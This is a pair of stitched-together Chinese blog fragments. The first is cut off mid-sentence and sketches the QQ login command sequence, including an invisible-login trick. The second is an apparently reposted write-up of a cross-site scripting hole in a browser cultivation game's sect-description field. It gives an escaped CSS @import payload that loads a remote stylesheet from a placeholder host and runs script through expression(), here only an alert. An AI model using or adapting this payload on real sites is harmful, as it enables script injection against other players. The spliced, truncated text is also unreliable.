首先当然是QQ登陆了。说到QQ协议，实在太烂了，已经很多牛人去研究过了。我就直接拿别人的成果过来好了。主要是参考了libqq的代码
http://code.google.com/p/libqq-pidgin/wiki/QQ2010Protocol
登陆过程就是一系列的命令，0x91, 0xba, 0xdd,0xe5, 0xe3, 0x30, 0xe9, 0xea, 0xeb, 0xec, 0xed。好了按照协议发完这一大堆的命令之后，就处于在线状态了。通过修改0x30的参数，可以实现隐身登陆。同时0x30命令也是最重要的，因

作者:孤鸿影 转载请注明来源
来源:http://hi.baidu.com/guhongying

朋友在玩修仙网页游戏,让帮忙找漏洞

进去大体看了下

门派简介的地方过滤不严格导致跨站漏洞

利用方式:

修改门派简介,加入以下代码:

<style>@\i\0m\00p\000o\00000r\000000t url(http://www.xxxx.com/x.txt);</style>

那个文本文件内容为:

body{
xss:expression(
if(!window.x)
{
window.x=1;
alert('孤鸿影');
}
)